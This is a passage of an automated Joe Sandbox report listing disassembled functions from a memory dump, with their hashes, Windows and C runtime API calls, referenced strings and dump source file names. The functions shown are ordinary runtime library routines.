                                                                                  • Opcode ID: 727cdb0f61d397990f33df1881d800833eed028beb9568ccb8709af8489e7f5c
                                                                                  • Instruction ID: 9a60017a488052e73cb1c4adf9f7bb2905abae51536c01676c309c722b09e0c4
                                                                                  • Opcode Fuzzy Hash: 727cdb0f61d397990f33df1881d800833eed028beb9568ccb8709af8489e7f5c
                                                                                  • Instruction Fuzzy Hash: F0019A75A001108BCB46FB209C4567D7BA3FF96720B15A04CE81A57381CF74AE82CFD9
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(00000000,?,0068D392,?,?,?,00000000), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,FFFFFFFF,000000FF,?,?,?,00000000), ref: 0068B059
                                                                                  • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0068509A,?,?,?,00000055,?,-00000050,?,?,?), ref: 0068F825
                                                                                  • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0068509A,?,?,?,00000055,?,-00000050,?,?), ref: 0068F85C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CodePageValid
                                                                                  • String ID: `/j$utf8
                                                                                  • API String ID: 943130320-95320002
                                                                                  • Opcode ID: f6ced61b6e6136d3e926b7dbe67d760223ffed52cabdbd69086c7a501b1033bf
                                                                                  • Instruction ID: 1fb9127e412af891d274115ff09ea816ae0eb7a856b3924774c53d5414acd384
                                                                                  • Opcode Fuzzy Hash: f6ced61b6e6136d3e926b7dbe67d760223ffed52cabdbd69086c7a501b1033bf
                                                                                  • Instruction Fuzzy Hash: 9B51C671600306BAEF25BB748C46BE673AAEF48700F150639F65597681FBB0E94087A9
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0069535D,00000000,?,006A8180,?,?,?,00695294,00000004,InitializeCriticalSectionEx,0069F434,0069F43C), ref: 006952CE
                                                                                  • GetLastError.KERNEL32(?,0069535D,00000000,?,006A8180,?,?,?,00695294,00000004,InitializeCriticalSectionEx,0069F434,0069F43C,00000000,?,0068AA0C), ref: 006952D8
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00695300
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 3177248105-2084034818
                                                                                  • Opcode ID: 313052f82e40ab785fde7cb02eb9868b8dde2eb94cec083c591f0d80754283f1
                                                                                  • Instruction ID: 79bf23bfe60ed8f2a1f334db341ca59a36e4d89bdcdbd3d1a913ded214b01bef
                                                                                  • Opcode Fuzzy Hash: 313052f82e40ab785fde7cb02eb9868b8dde2eb94cec083c591f0d80754283f1
                                                                                  • Instruction Fuzzy Hash: 34E01230284305B7DF212B60ED06B993B5B9B51B81F104021F90DA45E1EBE2F8108A54
                                                                                  APIs
                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00693122
                                                                                    • Part of subcall function 0068AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0068C6C1,?,00000000,-00000008), ref: 0068AED2
                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00693374
                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006933BA
                                                                                  • GetLastError.KERNEL32 ref: 0069345D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                  • String ID:
                                                                                  • API String ID: 2112829910-0
                                                                                  • Opcode ID: 9cb0797b0bf03a0e290b562dc1c80e56c647fc0f10177d064678dd088e037bb0
                                                                                  • Instruction ID: 91c527e9fab745a50c4147cd898217c51afd109dac9c03508e2e51edfd3f3829
                                                                                  • Opcode Fuzzy Hash: 9cb0797b0bf03a0e290b562dc1c80e56c647fc0f10177d064678dd088e037bb0
                                                                                  • Instruction Fuzzy Hash: 6DD16775D042589FCF15CFE8C8849EDBBBAFF09714F28416AE426EB751D630AA02CB50
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer
                                                                                  • String ID:
                                                                                  • API String ID: 1740715915-0
                                                                                  • Opcode ID: 112920b442846e34fd239665ee75207caa4d1c98efbf06b29f7863d88297ae7d
                                                                                  • Instruction ID: b8279b6cb704e5154cbec7becebd174d9d8ff27de1f026420d801b3a7a5fb062
                                                                                  • Opcode Fuzzy Hash: 112920b442846e34fd239665ee75207caa4d1c98efbf06b29f7863d88297ae7d
                                                                                  • Instruction Fuzzy Hash: E251DE726016029FFB25BF90D855BBA77A6FF04310F18432EEC4647291E732AE81CB52
                                                                                  APIs
                                                                                    • Part of subcall function 0068AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0068C6C1,?,00000000,-00000008), ref: 0068AED2
                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00690BEA
                                                                                  • __dosmaperr.LIBCMT ref: 00690BF1
                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00690C2B
                                                                                  • __dosmaperr.LIBCMT ref: 00690C32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1913693674-0
                                                                                  • Opcode ID: 2c178f4701363ad1280bb6e35b0c2f11ef35dad529a21ee106e00d1fb3187f96
                                                                                  • Instruction ID: c10682da5872958ff763c45ee79845291e055afcd8a24f678868368f3490e710
                                                                                  • Opcode Fuzzy Hash: 2c178f4701363ad1280bb6e35b0c2f11ef35dad529a21ee106e00d1fb3187f96
                                                                                  • Instruction Fuzzy Hash: 8521DE71600215FFAF60AF61C8819ABB7AFFF00368B10862CF959D7A11DB31EC508B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a906514410c0d9bcb42b25670a260271d7accf8ced909aac4729cfcfb44ca328
                                                                                  • Instruction ID: 9413e83aa689c49972feb0537088dd97edf4f8088380fd87ce8c147de29e780c
                                                                                  • Opcode Fuzzy Hash: a906514410c0d9bcb42b25670a260271d7accf8ced909aac4729cfcfb44ca328
                                                                                  • Instruction Fuzzy Hash: 5D21A171200205AF9B20BF61CC91DAA77AFBF423647144B2CF959CF251EB31EC5287A4
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00691F84
                                                                                    • Part of subcall function 0068AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0068C6C1,?,00000000,-00000008), ref: 0068AED2
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00691FBC
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00691FDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 158306478-0
                                                                                  • Opcode ID: c93d08c9103ce1f943e71f3469608df3ca4de312fdfa102a7a92e46ba265bcd1
                                                                                  • Instruction ID: 835abacce9666ea7ea19267a8c18aa61ea66dad0d0b05c8e0933465a17cfeba3
                                                                                  • Opcode Fuzzy Hash: c93d08c9103ce1f943e71f3469608df3ca4de312fdfa102a7a92e46ba265bcd1
                                                                                  • Instruction Fuzzy Hash: 7F11E5B250050ABEBB213BF15C89CAF696FCE8A3997100119F901D2602FF709D01D6B5
                                                                                  APIs
                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00672A8D
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00672A9B
                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00672AB4
                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00672AF3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                  • String ID:
                                                                                  • API String ID: 2261580123-0
                                                                                  • Opcode ID: eb28958dcb94e450319bf90837d42db93fcfb68c9b09ba1c2ca512eab3a5c35b
                                                                                  • Instruction ID: ac1d7512b63053903d9fcd5156014c636dd31bd79a6adecf14af9686e835f89c
                                                                                  • Opcode Fuzzy Hash: eb28958dcb94e450319bf90837d42db93fcfb68c9b09ba1c2ca512eab3a5c35b
                                                                                  • Instruction Fuzzy Hash: 9D21B3B4E0420A8FCB58EFA8C5956AEBBF2EF48300F01845DE459AB351D7789940CF55
                                                                                  APIs
                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00699952,00000000,00000001,?,?,?,006934B1,?,00000000,00000000), ref: 0069A487
                                                                                  • GetLastError.KERNEL32(?,00699952,00000000,00000001,?,?,?,006934B1,?,00000000,00000000,?,?,?,00692DF7,?), ref: 0069A493
                                                                                    • Part of subcall function 0069A4E4: CloseHandle.KERNEL32(FFFFFFFE,0069A4A3,?,00699952,00000000,00000001,?,?,?,006934B1,?,00000000,00000000,?,?), ref: 0069A4F4
                                                                                  • ___initconout.LIBCMT ref: 0069A4A3
                                                                                    • Part of subcall function 0069A4C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0069A461,0069993F,?,?,006934B1,?,00000000,00000000,?), ref: 0069A4D8
                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00699952,00000000,00000001,?,?,?,006934B1,?,00000000,00000000,?), ref: 0069A4B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                  • String ID:
                                                                                  • API String ID: 2744216297-0
                                                                                  • Opcode ID: 195cfc72e948d822a67b272de43b55460c10ac82bfe29b06bd7478a618f1d147
                                                                                  • Instruction ID: fedd7b42e56578b61224a6c742ecfaed4d39a0a813bb4af475049c2d204350e1
                                                                                  • Opcode Fuzzy Hash: 195cfc72e948d822a67b272de43b55460c10ac82bfe29b06bd7478a618f1d147
                                                                                  • Instruction Fuzzy Hash: 73F01C36140615BBCF223FD1DC08AD93FABFB8A7A0F114410FA1D85520DA729920AFE5
                                                                                  APIs
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0067EFB9
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0067EFC8
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0067EFD1
                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0067EFDE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                  • String ID:
                                                                                  • API String ID: 2933794660-0
                                                                                  • Opcode ID: 2e1bb5f6e1f3b0669b275e5d106a8c03225e1deb1e55770a1c868e44a009e1f0
                                                                                  • Instruction ID: 7c820e8aef68c50e1677b92553817cf0acfd2d93a6a6dcf95ada45ca7de8a2d9
                                                                                  • Opcode Fuzzy Hash: 2e1bb5f6e1f3b0669b275e5d106a8c03225e1deb1e55770a1c868e44a009e1f0
                                                                                  • Instruction Fuzzy Hash: E7F0B270C0020CEBCB00EFF4CA4898EBBF4EF5D200BA15996A412E7154EB70AB44CF50
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strcspn
                                                                                  • String ID: @
                                                                                  • API String ID: 3709121408-2766056989
                                                                                  • Opcode ID: 9cde93131be3126c67441178b512410390aba98c9c45e4570fccb4e3f52b71c5
                                                                                  • Instruction ID: 93f04faec5c2f63e732a95fa27cb77a228d448a359a54d376137725be7d45a5e
                                                                                  • Opcode Fuzzy Hash: 9cde93131be3126c67441178b512410390aba98c9c45e4570fccb4e3f52b71c5
                                                                                  • Instruction Fuzzy Hash: 2332B2B4904269CFDB64DF64C981A9DBBF1BF48300F0585AAE84DA7341D734AE85CF52
                                                                                  APIs
                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0068A6E1,?,?,00000000,00000000,00000000,?), ref: 0068A805
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodePointer
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 2118026453-2084237596
                                                                                  • Opcode ID: 05e2605df3b6f99f7c221b704fc4c1d8e6c877a0ea41c92c6b3d3c0ba0625877
                                                                                  • Instruction ID: 1016494cf24ad048d7ad40bf3075514191f121f06af4090354d8cf31a5378c6a
                                                                                  • Opcode Fuzzy Hash: 05e2605df3b6f99f7c221b704fc4c1d8e6c877a0ea41c92c6b3d3c0ba0625877
                                                                                  • Instruction Fuzzy Hash: 9F418B71900209AFDF16EF94CC81AEEBBB6FF08300F1982AAF90467221D3359951DF65
                                                                                  APIs
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0068A2C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___except_validate_context_record
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 3493665558-3733052814
                                                                                  • Opcode ID: 7e7864615e8a9d211fd3ebedf73900d943ad022d7aeed8d1d4834b438e8387ec
                                                                                  • Instruction ID: 261ed36d33c724ae20194ca0dd8909656455967eff9ae23622e5a7053d1c68af
                                                                                  • Opcode Fuzzy Hash: 7e7864615e8a9d211fd3ebedf73900d943ad022d7aeed8d1d4834b438e8387ec
                                                                                  • Instruction Fuzzy Hash: E331AF32400218DBEF26AF94C8409AE7B67FF09715B18875BFC4489221C336D8A2DB92
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674B2B
                                                                                    • Part of subcall function 0067BE78: _Yarn.LIBCPMT ref: 0067BE98
                                                                                    • Part of subcall function 0067BE78: _Yarn.LIBCPMT ref: 0067BEBC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569491244.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569472759.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569517514.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569535803.00000000006A6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569552145.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2569567896.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Yarn$LockitLockit::_std::_
                                                                                  • String ID: ^Ig$bad locale name
                                                                                  • API String ID: 360232963-1188953556
                                                                                  • Opcode ID: fc427fd012ce731cc1fb697fd8d31c6cbe6fe231dbc91d3b304eecf5e2111920
                                                                                  • Instruction ID: f5f541d50dc4dd153d1a811e88ae8c633f1eac761763520790d352c0af5a6d63
                                                                                  • Opcode Fuzzy Hash: fc427fd012ce731cc1fb697fd8d31c6cbe6fe231dbc91d3b304eecf5e2111920
                                                                                  • Instruction Fuzzy Hash: 4B01D670905108DBDB48FFA9D495BAD7BB2AF44308F04846CE64A57342DF30AA90CB9A